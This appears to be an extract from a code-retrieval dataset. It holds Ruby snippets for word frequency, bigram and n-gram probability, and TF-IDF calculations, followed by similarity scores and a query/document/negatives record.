"def addtoB(title)\n\t#title = \"let's see what this is doing\"\n\tstops = [\" a \", \" an \", \" and \", \" by \", \" for \", \" from \", \" in \", \" of \", \" on \", \" or \", \" out \", \" the \", \" to \", \" width \"] # list of stop words\n\tfor word in stops do # go through the stop words: if they exist in the sentence, we will...\n\t\t\ttitle = title.gsub(word, \" \") # changes word to NOTHING! Well, a space I guess. but still.\n\t\tend\n\n\ttitle_words = title.split(\" \") # splits title into various words\n\n\twhile (title_words.length > 1)\n\t\tfirst_word = title_words[0] # saves the first word to title bigram\n\t\tnext_wrd = title_words[1] # the next word in the title is the one we want to add\n\t\ttitle_words = title_words[1..-1] # chops off the first word and proceeds through\n\n\t\tif ($bigrams.has_key?(first_word)) # if we already have a key, we don't need a new hash\n\t\t\t# do nothing\n\t\telse\n\t\t\t$bigrams[first_word] = Hash.new # if word hasn't been encountered before, give it a new hash\n\t\tend\n\t\t\t\tif ($bigrams[first_word].has_key?(next_wrd)) # if the next word exists for the current word...\n\t\t\t\t\t$bigrams[first_word][next_wrd] = $bigrams[first_word][next_wrd] + 1 # then all we're doing is incrementing the count for that word by one.\n\t\t\t\telse\n\t\t\t\t$bigrams[first_word].merge!(next_wrd => 1) # otherwise, we will set the count of that word to one.\n\t\t\tend\n\t\tend\n\tend",
"def probability_token_is_label(token, label, prob_label)\n token_count = token_count(token)\n prob_token = token_count / @doc_counts.values.reduce(:+).to_f\n return nil if prob_token == 0.0\n\n prob_token_in_label = probability_token_in_label(label, token)\n (prob_token_in_label * prob_label) / prob_token\n end",
"def probability var, val\n unless self.count.zero?\n self.count{|r| r[var] == val}.fdiv(self.count)\n else\n 0\n end\n end",
"def percent_of_word(word)\n @total_count = SubWordJoin.where(word: word).count\n puts @total_count\n sub_count = 0\n @sub = SubDriver.where(driver: self)\n @sub.each do |sub|\n sub_count += SubWordJoin.where(word: word, sub_driver: sub).count\n end\n\n percent = (sub_count.to_f/@total_count)*100\n return percent.round(2)\n\n end",
"def freq\n @freq ||= begin\n # calculate ngram counts for the haystack\n counts = Hash.new(0)\n veach(\"Haystack\", @haystack) do |element|\n element.ngrams.each do |ngram|\n counts[ngram] += 1\n end\n end\n\n # turn counts into inverse frequencies\n map = Hash.new(1)\n total = counts.values.inject(&:+).to_f\n counts.each do |ngram, count|\n map[ngram] = ((total / count) * 10).round\n end\n map\n end\n end",
"def word_freq(text)\n frequency = {}\n unique_words(text).each do |word|\n frequency[word] = 0\n end\n split_normalise(text).each do |word|\n frequency[word] += 1\n end\n frequency\nend",
"def calculate\n document_frequency.each_with_object({}) do |(word, freq), idf|\n idf[word] = Math.log(@corpus.size/freq)\n end\n end",
"def calculate_probability(useful_results, reroll_count)\n return 100.0 * useful_results / ( 6 ** reroll_count )\n end",
"def probability_of_class(classification)\n @number_of_documents_in_class[classification] / @number_of_documents.to_f\n end",
"def most_frequent_bigram(str)\n bigram = Hash.new(0)\n (0...str.length).each { |index| bigram[str[index..index+1]] += 1 }\n bigram.key(bigram.values.max)\nend",
"def contar(texto)\n palavras = texto.split\n\n frequencies = Hash.new(0)\n\n palavras.each do |word|\n frequencies [word] += 1\n end\n\n frequencies = frequencies.sort_by do |wor, count|\n end\n frequencies.reverse!\n\n frequencies.each do |wor, count|\n puts wor + \" \" + count.to_s\n end\nend",
"def test_approach\n prefix = \"This pangram tallies \"\n solution = \"This pangram tallies five a's, one b, one c, two d's, twenty-eight e's, eight f's, six g's, eight h's, thirteen i's, one j, one k, three l's, two m's, eighteen n's, fifteen o's, two p's, one q, seven r's, twenty-five s's, twenty-two t's, four u's, four v's, nine w's, two x's, four y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n\n prefix = \"This terribly inefficient pangram contains \"\n solution = \"This terribly inefficient pangram contains five a's, two b's, three c's, two d's, thirty-one e's, six f's, four g's, ten h's, sixteen i's, one j, one k, three l's, two m's, twenty n's, thirteen o's, two p's, one q, twelve r's, twenty-eight s's, twenty-eight t's, three u's, three v's, nine w's, four x's, six y's and one z.\"\n pangram = SelfDocumentingPangram.new(prefix)\n assert_equal(solution, pangram.add_count(pangram.count(solution)))\n end",
"def gramos\r\n grams = 0\r\n @lista_alimentos.each do |i|\r\n grams += 100\r\n end\r\n return grams\r\n end",
"def frequency\n counts = Hash.new(0)\n self.words.each { |word| counts[word] += 1 }\n counts\n end",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n\n i = 0\n while i < str.length - 1\n bigrams[str[i..i+1]] += 1 \n i += 1\n end\n\n max_num = 0\n max = nil\n\n bigrams.each do |k,v|\n if v > max_num\n max_num = v\n max = k\n end\n end\n max\nend",
"def score(sentence)\n total_scores = 0\n rep_array = @sent_rep_compiler.compile(sentence)\n rep_array.each { |word| total_scores += @wts_scores_obj[word.id] }\n total_scores / rep_array.length\n end",
"def lexigram_counter(sequencetext)\n @sequencetext = sequencetext\n\t@lexigrams = lexigram_searcher(@sequencetext)\n\tif (@lexigrams === [\"no letters remain after processing\"])\n\t @lexigrams_count = 0\n else\n @lexigrams_count = @lexigrams.count.to_s\n end\n end",
"def english?(text)\n num_english = 0\n text_words = text.split(\" \")\n text_words.each do |text_word|\n WORDS_BY_FREQUENCY.each do |dict_word|\n if text_word == dict_word.upcase\n num_english += 1\n break\n end\n end\n end\n return num_english.to_f / text_words.length > 0.75\nend",
"def score\n @score ||= phonetic_levenshtein_distance + penalties\n end",
"def most_frequent_bigram(str)\n sub_str_arr = []\n bigram_count = Hash.new(0)\n str.each_char.with_index do |char,idx|\n if idx+1 != nil && str[idx..idx+1].length ==2\n sub_str_arr << str[idx..idx+1]\n end\n end\n sub_str_arr.each {|bigram| bigram_count[bigram]+=1}\n \n sorted = bigram_count.sort_by {|key,value| value}\n sorted [-1][0]\n\n\nend",
"def most_frequent_bigram(str)\n#grab substrings of length 2\n#hash that contains the substring\n#return key with max value \n\n bigrams = Hash.new(0)\n str.each_char.with_index do |char, i|\n bigrams[str[i..i+1]] += 1 if i + 1 < str.length\n end\n bigrams.max_by { |k,v| v }.first\nend",
"def most_frequent_bigram(str)\n bigrams = Hash.new(0)\n (0...str.length-1).each{|i| bigrams[ str[i..i+1] ] += 1}\n max = bigrams.first[0] # Hash#first returns first key value pair in an array\n bigrams.each {|key,val| max = key if val > bigrams[max]}\n # bigrams.sort_by{|b, v| v}.last[0]\n max\nend",
"def ngram_analysis(str, n)\r\n # use a hash to store ngram - frequency mapping\r\n freq = Hash.new\r\n bigram = \"\"\r\n count = n-1\r\n i = 0\r\n\r\n # get the first ngram\r\n for i in 0..count\r\n bigram[i] = str[i]\r\n end\r\n\r\n freq[bigram] = 1\r\n\r\n str.each_char do |char|\r\n if i>=n then\r\n\r\n # bigram, trigram or quadrigram?\r\n bigram[0] = bigram[1]\r\n if n==2 then\r\n bigram[1] = char\r\n elsif n==3 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = char\r\n elsif n==4 then\r\n bigram[1] = bigram[2]\r\n bigram[2] = bigram[3]\r\n bigram[3] = char\r\n end\r\n\r\n # updates values in the hash\r\n if freq.key?(bigram)==false then\r\n freq[bigram] = 1\r\n else \r\n freq[bigram] = freq[bigram]+1\r\n end\r\n\r\n end\r\n i = i + 1\r\n end\r\n\r\n # sort and print\r\n freq = freq.sort_by {|_key, value| value}.reverse.to_h\r\n i=0\r\n puts \"N-gram Analysis Results:\"\r\n freq.each do |key, value|\r\n if value!=1 && i<20 then\r\n puts key.to_s+\"\\t\"+value.to_s\r\n end\r\n i = i + 1\r\n end\r\nend",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n\n str.each_char.with_index do |char, i|\n if i != str.length - 1\n bigram = char + str[i + 1]\n end\n hash[bigram] += 1\n end\n most_frequent = hash.values.max\n hash.each { |k, v| return k if v == most_frequent}\n\nend",
"def frequency(text)\n text = text.downcase.gsub(/\\s*/, '')\n chars = text.split('')\n freqs = Hash[('a'..'z').to_a.zip([0] * 26)]\n\n chars.each { |c| freqs[c] += 1 }\n\n freqs\n end",
"def most_frequent_bigram(str)\n most_frequent_bigram = Hash.new(0)\n\n str.each_char.with_index do |char, index|\n bigram = \"#{char}#{str[index + 1]}\"\n most_frequent_bigram[bigram] += 1\n end\n\n max_count = most_frequent_bigram.sort_by {|k, v| v}\n max_count[-1][0]\nend",
"def fragment_commonality(fragment)\n probability_of_ngrams(common_ngrams_from_fragment(fragment))\n end",
"def grams\n gram_equivalent / amount\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index {|c, i| hash[c + str[i+1]] += 1 if str[i + 1]}\n hash.key(hash.values.max)\nend",
"def term_frequency(document, term)\n tf = document.term_count(term)\n if @function == :bm25\n (tf * 2.2) / (tf + 0.3 + 0.9 * documents.size / @model.average_document_size)\n else\n sqrt(tf)\n end\n end",
"def most_frequent_bigram(str)\n adjacent_letter={}\n letter=\"\"\n (0...str.length-1).each do |i|\n letter=str[i]+str[i+1]\n if adjacent_letter.has_key?(letter)\n adjacent_letter[letter]+=1\n else\n adjacent_letter[letter]=1\n end\n end\n\n max=0\n max_aj=\"\"\n adjacent_letter.each do |k,v|\n if v>max\n max=v\n max_aj=k\n end\n end\n max_aj\n\n\nend",
"def get_sentence_progresses\n if @all_sentence_count > 0\n @progress_sentence_ch = 100 * @memorized_sentence_count_ch / @all_sentence_count\n @progress_sentence_ja = 100 * @memorized_sentence_count_ja / @all_sentence_count\n else\n @progress_sentence_ch = 0\n @progress_sentence_ja = 0\n end\n end",
"def probabilities_for(ngrams)\n table = {}\n\n ngrams.each do |ngram|\n table[ngram] = probability_of_ngram(ngram)\n end\n\n return table\n end",
"def popularity_boost\n return 0 if word_datas.empty?\n\n rare_words = word_datas.select { |data| data[:rarity] }\n return 0 if rare_words.empty?\n\n # 0-1 score for popularity\n # Then divide it by 0-1 for word length\n boosts = rare_words.map do |word|\n 1 - Math.log(word[:rarity] + 1, 60_000)\n end\n boosts.reduce(0, &:+)\n end",
"def has_gram?(gram)\n @frequencies.has_key?(gram)\n end",
"def score_freq(cs)\n \" eta\".each_char.map { |c| cs.index(c) || 9999 }.reduce(&:+)\nend",
"def percentages\n @_percentages ||= words.each_with_object({}) do |word_count, hash|\n hash[word_count.first] = percentage(word_count.last)\n end\n end",
"def most_frequent_bigram(str)\n hash = Hash.new(0)\n str.each_char.with_index do |char, idx|\n key = char + str[idx + 1] if idx < str.length - 1\n hash[key] += 1\n end\n\n hash.key(hash.values.max)\nend",
"def score_title title, freq_list\n title\n .split\n .map{|word| is_initialism(word) ? 4 : score_for_frequency(freq_list[sanitize word])}\n .inject(:+)\n end",
"def phonetic_coverage\n 1 - phones_in_word_list/@initial_phones.to_f\n end",
"def count(gram)\n @dirty = true\n\n unless @frequencies.has_key?(gram)\n @frequencies[gram] = 0\n end\n\n return @frequencies[gram] += 1\n end",
"def most_frequent_bigram(str)\n counter = Hash.new(0)\n (0...str.length-1).each { |i| counter[str[i] + str[i+1]] += 1 }\n sorted = counter.sort_by { |k, v| v }\n sorted[-1][0]\nend"
] | [
"0.7525785",
"0.73970234",
"0.70978487",
"0.6869366",
"0.68479264",
"0.68038917",
"0.6729877",
"0.6543553",
"0.64418244",
"0.6419717",
"0.6325295",
"0.63038254",
"0.62904406",
"0.62812465",
"0.62567854",
"0.62363577",
"0.62209475",
"0.6212022",
"0.62085927",
"0.6198233",
"0.6188971",
"0.61854017",
"0.6178421",
"0.61348134",
"0.6121978",
"0.6111741",
"0.6073402",
"0.6071395",
"0.60710406",
"0.6024717",
"0.5990377",
"0.5990095",
"0.59848964",
"0.594559",
"0.5936904",
"0.5930776",
"0.59094816",
"0.589197",
"0.5874413",
"0.58641505",
"0.5857109",
"0.5852107",
"0.5848248",
"0.5841763",
"0.58180803",
"0.58155346",
"0.5814226",
"0.5809941",
"0.58047205",
"0.5796977",
"0.578404",
"0.5783301",
"0.577499",
"0.57727563",
"0.5769943",
"0.5766564",
"0.57592744",
"0.5750287",
"0.5750269",
"0.57475096",
"0.57460743",
"0.5720607",
"0.571913",
"0.5708175",
"0.5697505",
"0.5680021",
"0.5679883",
"0.567592",
"0.567302",
"0.5669892",
"0.5669096",
"0.56497025",
"0.56450146",
"0.5630032",
"0.56216925",
"0.5618389",
"0.5617837",
"0.56172067",
"0.55966276",
"0.55929476",
"0.5587389",
"0.55819714",
"0.55800414",
"0.5577533",
"0.55715036",
"0.5570117",
"0.5560356",
"0.5555435",
"0.5552366",
"0.5550079",
"0.55496424",
"0.55377394",
"0.55352867",
"0.5533176",
"0.55292755",
"0.55235726",
"0.5521859",
"0.5518092",
"0.551356",
"0.55128646"
] | 0.6757227 | 6 |
File-weighted probability of the bigram appearing in the corpus. TODO: Don't count file probability. | def score(word1, word2=nil)
weight = 1 #file_probability(word1, word2)
weight * probability(word1, word2)
end | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def file_probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.files.size) / analysis.files.size\n end",
"def file_probability(word, threshold=0)\n word = (Word === word ? word : get(word))\n n = 1 # at least one\n word.files.each do |f, c|\n n += 1 if c > threshold\n end\n BigDecimal.new(n) / corpus_files.size\n end",
"def weighted_probability(word)\n word = (Word === word ? word : get(word))\n\n p = BigDecimal.new(1)\n p = p * probability(word)\n p = p * file_probability(word, 1)\n #p = p * lexicon_weight(word)\n #p = p * weight_length(word)\n #p = p * weight_stem(word)\n #p = p * weight_plural(word)\n p\n end",
"def probability(word1, word2=nil)\n bigram = (Bigram === word1 ? word1 : get(word1, word2))\n BigDecimal.new(bigram.count) / total #size\n end",
"def bigram_count()\n\t@corpus.each { |sentence_arr|\n\t prev_word = \"\"\n\t sentence_arr.each { |word|\n\t\tif(prev_word != \"\")\n\t\t @bifreq[prev_word + \" \" + word] += 1\n\t\telse\n\t\t @bifreq[\"PHI \"+word] += 1\n\t\tend \t \t\n\t\tprev_word = word\n\t }\n\t}\n end",
"def probability_of(gram)\n @probabilities.fetch(gram,0.0)\n end",
"def calculate_probability(word)\n ham_word_frequency = 2 * words_hash[[word,:good]]\n spam_word_frequency = words_hash[[word, :bad]]\n return if ham_word_frequency + spam_word_frequency < 5\n word_probability = min(1.0, spam_word_frequency.to_f / spam_count)\n total_probability = word_probability + min(1.0, ham_word_frequency.to_f / ham_count)\n max(0.1, min(0.99, word_probability/total_probability))\n end",
"def p(trigram)\n\n bigram = trigram[1..2]\n unigram = trigram[2..2]\n # see which case we fall into for this backoff scheme\n if @counts.include?(trigram)\n # p1 function, trigram exists\n return pML(trigram, @discount)\n else\n ngram = nil\n beta_gram = nil\n alpha = 0\n if @counts.include?(bigram)\n # p2 function, no trigram but bigram exists\n ngram = bigram\n beta_gram = trigram[0..1] # the words used to help generate a beta-set of zero-count trigram\n # alpha mass redistribution\n alpha = @weights[:p2] * (1 - pML(trigram, @discount))\n else\n # p3 function, no trigram or bigram\n ngram = unigram\n beta_gram = trigram[0..0] # the words used to help generate a beta-set of zero-count bigrams\n # alpha mass redistribution\n alpha = @weights[:p3] * (1 - pML(trigram, @discount))\n end\n\n numerator = pML(ngram) \n denominator = @beta_gram_cache.fetch(beta_gram, nil) \n if not denominator\n dgram = nil\n sum = 0\n @vocab.each do |v| # all permutations of vocab words\n dgram = beta_gram + [v]\n # that are zero-count ngrams of (w,w_i-1,w_i-2) or (w,w_i-1)\n if not @counts.include?(dgram)\n # should be part of the sum of pML(w|w_i-1) or pML(w)\n sum += pML(dgram.drop(1)) # drop w_i-2 or w_i-1 as needed\n end\n end\n\n @beta_gram_cache.store(beta_gram, sum)\n denominator = sum\n end\n\n if denominator == 0 then return 0 end\n return alpha * numerator / denominator\n end\n\n end",
"def calculate_kn_probability next_ngram: nil, ngram_model: 0, discount: 0.25, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n \n return calculate_mle_probability(next_ngram: next_ngram, separator: separator) if local_ngram_model==1 # Recursion stops at the unigram model\n\n prefix_regex = /^#{next_ngram.split(separator)[0..-2].join(separator)}\\b/\n prefix = next_ngram.split(separator)[0..-2].join(separator)\n suffix = next_ngram.split(separator).last\n similar_ngrams = ngram_counts[local_ngram_model].select{|ngram, _| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown}\" if (@verbose and ngram.match(prefix_regex)); ngram.match(prefix_regex)}.count # Number of words which complete the current n-1 gram, e.g. for the n-gram \"your house looks nice\" we count \"yhl ugly\", \"yhl fine\" etc. Notice - we don't counts the number of occurences for \"yhl ugly\" etc but only the number of lower-order ngrams which complete the current ngram.\n puts \"#{'Total of '.red + similar_ngrams.to_s.red + ' found.'.red} Now calculating counts.\" if @verbose\n similar_ngrams_total_counts = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{prefix.green} #{ngram.split[1..-1].join(\" \").brown} with raw count of #{counts}\" if (@verbose and ngram.match?(prefix_regex)); if ngram.match(prefix_regex) then acc += counts; else acc; end} # It's here that we actually sum up the counts\n puts \"#{'Total count is '.red + similar_ngrams_total_counts.to_s.red}\"\n ngrams_with_fixed_suffix = ngram_counts[local_ngram_model].reduce(0){|acc, (ngram, counts)| puts \"Found #{ngram.brown} / #{suffix.green} with raw count of #{counts}\" if (@verbose and ngram.match?(/^#{suffix}\\b/)); acc += counts if ngram.match?(/^#{suffix}\\b/); acc}\n\n first_term = [get_raw_counts(next_ngram).to_f - discount, 0].max / similar_ngrams_total_counts.to_f\n second_term = discount * (similar_ngrams.to_f/ngrams_with_fixed_suffix.to_f)\n \n return first_term + (second_term * calculate_kn_probability(next_ngram: next_ngram.split(separator)[1..-1].join(separator)))\n end",
"def most_probable_next_word(string)\n words = string.split(\" \")\n bigram_key = words.last\n trigram_key = words.last(2).join(\" \") if words.count >= 2\n most_probable_word = \"\"\n\n ## if we can find trigram and trigram exists\n if words.count >= 2 and @trigrams[trigram_key] != nil\n # get w3 from grams with highest P(w1,w2,w3) = P(w1)*P(w2|w1)*P(w3|w1,w2)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(trigram_key + \" \" + word)\n # if P(w1)*P(w2|w1)*P(w3|w1,w2) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n\n puts \"ERROR IN TRIGRAMS\" if highest_probability == 0.0\n puts \"Trigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 3).round(4).to_s\n return most_probable_word\n ## if we can find a bigram and bigram exists\n elsif words.count >= 1 and @bigrams[bigram_key] != nil\n # get w2 from grams with highest P(w2|w1)\n highest_probability = 0.0\n\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(bigram_key + \" \" + word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"ERROR IN BIGRAMS\" if highest_probability == 0.0\n puts \"Bigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 2).round(4).to_s\n return most_probable_word\n ## return random unigram?\n else\n highest_probability = 0.0\n @unigrams.each_key do |word|\n tempProb = probability_of_sequence(word)\n # if P(w1)*P(w2|w1) > highest_probability\n if tempProb > highest_probability\n highest_probability = tempProb\n most_probable_word = word\n end\n end\n puts \"Unigram, highest_probability: \" + highest_probability.to_s + \" Perplexity: \" + perplexity(highest_probability, 1).round(4).to_s\n return most_probable_word\n end\n end",
"def calculate_gt_probability next_ngram: nil, ngram_model: 0, ngram_counts: @ngram_counts, good_turing_bins: @good_turing_bins, separator: \" \"\n local_ngram_model = ngram_model==0 ? next_ngram.split(separator).count : ngram_model\n next_ngram_rawcount = ngram_counts[local_ngram_model][next_ngram].to_i\n\n if next_ngram_rawcount == 0 # Distributing P*(unseen)\n return good_turing_bins[local_ngram_model][1].to_f/good_turing_bins[local_ngram_model][0] if @oov_counts.nil? # if no oov are set, we assign the whole probability mass to every missing token\n return (@leftover_probability[local_ngram_model]/@oov_counts[local_ngram_model].values.sum)*@oov_counts[local_ngram_model][next_ngram] # otherwise we assign only part of it\n else\n revised_counts = get_revised_counts next_ngram: next_ngram, ngram_model: local_ngram_model\n return revised_counts.to_f/good_turing_bins[local_ngram_model][0]\n end\n end",
"def calculate_probabilities\n @words_hash.keys.each do |word, _|\n @probability_hash[word] = calculate_probability(word)\n end\n end",
"def word_prob(category, word)\n cat_freq = word_freq(category, word)\n non_cat_freq = word_freq(counter.keys, word) - cat_freq\n cat_docs = doc_size(category)\n non_cat_docs = doc_size(doc_counter.keys) - cat_docs\n\n cat_prob = [1.0 * cat_freq / cat_docs, 1.0].min\n non_cat_prob = [1.0 * non_cat_freq / non_cat_docs, 1.0].min\n\n if cat_prob == 0.0\n cond_prob = 0.4\n else\n cond_prob = 1.0 * cat_prob / (cat_prob + non_cat_prob)\n end\n\n # STDOUT.puts \"#{category}-#{word}, cat #{cat_prob}, non_cat #{non_cat_prob}, cond_p #{cond_prob}\"\n\n cond_prob = [[cond_prob, 0.99].min, 0.01].max\n end",
"def probability_of_ngrams(ngrams)\n probabilities = probabilities_for(ngrams).values\n \n return (probabilities.inject { |joint,prob| joint * prob } || 0.0)\n end",
"def text_probability(text)\n probability_of_ngrams(ngrams_from_text(text))\n end",
"def probability(word)\n word = (Word === word ? word : get(word))\n BigDecimal.new(word.count) / total\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\tbegin\n\t\tIO.foreach(file_name, encoding: \"utf-8\") do |line|\t\t\t\t\t\t\t\t\t\t\t\t\t#for each line\n\t\t\ttitle = cleanup_title(line)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#clean up title\n\t\t\tif title != nil\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#unless the title doesnt exist\n\t\t\t\twords = title.split(/\\s/)\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#split the title into seperate words and remove all the stop words mentioned in the lab\n\t\t\t\twords.delete(\"a\")\n\t\t\t\twords.delete(\"an\")\n\t\t\t\twords.delete(\"and\")\n\t\t\t\twords.delete(\"by\")\n\t\t\t\twords.delete(\"for\")\n\t\t\t\twords.delete(\"from\")\n\t\t\t\twords.delete(\"in\")\n\t\t\t\twords.delete(\"of\")\n\t\t\t\twords.delete(\"on\")\n\t\t\t\twords.delete(\"or\")\n\t\t\t\twords.delete(\"out\")\n\t\t\t\twords.delete(\"the\")\n\t\t\t\twords.delete(\"to\")\n\t\t\t\twords.delete(\"with\")\n\t\t\t\t(0..words.size-2).each do |i|\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t# for the size of the words array minus two because we dont want to check bigrams of the last word\n\t\t\t\t\tif $bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"].nil?\t\t\t\t\t\t\t\t\t\t#if the first layer doesnt contain the current word, add it with it's following word with a value of 1\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"].store(\"#{words[i+1]}\", 1)\n\t\t\t\t\telse\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t#otherwise, increment the value of the following key word\n\t\t\t\t\t\t$bigrams[\"#{words[i]}\"][\"#{words[i+1]}\"] += 1\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\t\t#p $bigrams.values.inspect\n\t\tend\n\t\t#puts mcw(\"a\")\n\t\tputs \"Finished. Bigram model built.\\n\"\n\t#rescue\n\t\t#STDERR.puts \"Could not open file\"\n\t\t#exit 4\n\tend\nend",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# call cleanup_title method to extract song titles\n\t\t\ttitle = cleanup_title(line)\n\n\t\t\t#ignore titles with non-english characters\n\t\t\tif title[/(\\w|\\s|\\')*/] == title\n\t\t\t\ttitle = title.split\n\t\t\t\ti = 0;\n\n\t\t\t\twhile i <= title.size-1 #loop through array of words\n\t\t\t\t\thasKey = $bigrams[title[i]] #first word\n\t\t\t\t\thasChild = $bigrams[title[i]] && $bigrams[title[i]][title[i+1]] #second word that follows first\n\t\t\t\t\tbreak if title[i+1].nil? #break if this is the last word in the array\n\n\t\t\t\t\tif hasChild #if child of primary key exists, add one to the count\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] += 1;\n\t\t\t\t\telsif hasKey #if primary key exists, add new child with initial count = 1\n\t\t\t\t\t\t$bigrams[title[i]][title[i+1]] = 1;\n\t\t\t\t\telse #if primary key does not exist, add it and child key\n\t\t\t\t\t\t$bigrams[title[i]] = {title[i+1] => 1};\n\t\t\t\t\tend\n\t\t\t\t\ti += 1;\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\t end\nend",
"def process_file(file_name)\r\n\tputs \"Processing File.... \"\r\n\r\n\tbegin\r\n\t\tcounter = Hash.new\r\n\t\tfile = File.open(file_name)\r\n\t\tuntil file.eof?\r\n\t\t\tfile.each_line do |line|\r\n\t\t\t\t# do something for each line\r\n\t\t\t\ttitle = cleanup_title(line)\r\n\t\t\t\tunless(title == \"\")\r\n\t\t\t\t\tbigram = title.split().each_cons(2).to_a\r\n\t\t\t\t\tbigram = bigram.map{ |n| n.join(' ')}\r\n\t\t\t\t\tbigram = bigram.each_with_object(Hash.new(0)){|word, obj| obj[word] += 1}\r\n\t\t\t\t\tif bigram.any?\r\n\t\t\t\t\t\tcounter.merge!(bigram) { |k, old, new| old + new}\r\n\t\t\t\t\tend\r\n\t\t\t\tend\r\n\t\t\tend\r\n\t\tend\r\n\t\tfile.close\r\n\r\n\t\t$bigramsArray = counter.sort_by { |k, v| -v }\r\n\t\tcreate_hash()\r\n\t\t#$bigrams = $bigrams.to_h\r\n\r\n\t\t#$bigramsHash = Hash.new\r\n\t\t#$bigramsHash = $bigrams.to_h\r\n \t#$bigrams.each { |k, v| puts \"#{v} => #{k}\"}\r\n\r\n\r\n\t\tputs \"Finished. Bigram model built.\\n\"\r\n\trescue\r\n\t\tSTDERR.puts \"Could not open file\"\r\n\t\texit 4\r\n\tend\r\n\r\nend",
"def dump_bigram_info_from_hash()\n\n cumulative_bigram_count = 0\n\n $bigram_count.keys.sort.each do |bigram|\n local_lead_word = bigram.split(/\\s/)[0] #shouldn't need to extract this each time\n cumulative_bigram_count += $bigram_count[bigram]\n cumulative_proportion = cumulative_bigram_count.to_f / $lead_word_count[local_lead_word].to_f\n puts sprintf(\"%s\\t%f\", bigram, cumulative_proportion )\n end\n\nend",
"def doc_probability(category)\n doc_prob = 1.0\n self.words.each do |word|\n doc_prob *= BayesCategory.where(:category=>category).first.word_probability(word[0])\n end\n doc_prob\n end",
"def spamicity(message)\n words = message.split(/\\W+/).map { |m| m.downcase}\n intersting_words_probability_list = intersting_words(words)\n intersting_words_product = intersting_words_probability_list.inject(:*)\n total_probability = intersting_words_product + intersting_words_probability_list.map { |x| 1 - x }.inject(:*)\n intersting_words_product / total_probability\n end",
"def prom_weight\n if pet_histories.length > 0\n promw= pet_histories.sum(:weight)\n promw/pet_histories.length\n else\n \"0\"\n end\n end",
"def byteweight(path_or_string)\n path_or_string=\"\" if path_or_string.nil?\n \n if File.exists?(path_or_string)\n File.size(path_or_string)\n else\n bweight=0\n path_or_string.each_byte{|b|bweight+=1}\n bweight\n end\n end",
"def word_tag_probability(word, tag)\n denom = @tag_frequencies[tag]\n\n if denom.zero?\n 0\n else\n @word_tag_combos[\"#{word}/#{tag}\"] / denom.to_f\n end\n end",
"def process_file(file_name)\n\tputs \"Processing File.... \"\n\n\tbegin\n\t\tall = Hash.new\n\t\tIO.foreach(file_name) do |line|\n\t\t\t# do something for each line\n\t\t\ttitle = cleanup_title(line)\n\t\t\tunless title.nil?\n\t\t\t\tgram = title.split().each_cons(2).to_a\n\t\t\t\tgram = gram.map{ |n| n.join(' ') }\n \t\t\t\tgram = gram.each_with_object(Hash.new(0)) { |word, obj| obj[word] += 1 }\n \t\t\t\tif gram.any?\n\t \t\t\t\tall.merge!(gram) { |k, old, new| old + new }\n\t \t\t\tend\n\t\t\tend\n\t\tend\n\t\t$bigramsArray = all.sort_by { |k, v| -v }\n\t\tcreate_hash()\n\t\tputs \"Finished. Bigram model built.\\n\"\n\trescue\n\t\tSTDERR.puts \"Could not open file\"\n\t\texit 4\n\tend\nend",
"def qML(ngram)\n # if the numerator count is zero, return zero\n if not @counts.include?(ngram) then return 0 end\n\n # extract a denominator ngram based on the size of the numerator ngram\n dgram = nil\n case ngram.size\n when 3\n # get a bigram\n dgram = ngram[0..1]\n when 2\n # get a unigram\n dgram= ngram[0..0]\n end\n\n if dgram\n # if the denominator count would be zero, return 0\n if not @counts.include?(dgram) then return 0 end\n return @counts.fetch(ngram, 0).to_f / @counts.fetch(dgram, 0).to_f\n else\n # if the denominator count would be zero, return 0\n if @word_count == 0 then return 0 end\n return @counts.fetch(ngram, 0).to_f / @word_count.to_f\n end\n\n rescue ZeroDivisionError\n 0\n end",
"def tally!(file_count)\n @table.each do |words, bigram|\n bigram.tally!(table.size, file_count)\n end\n end",
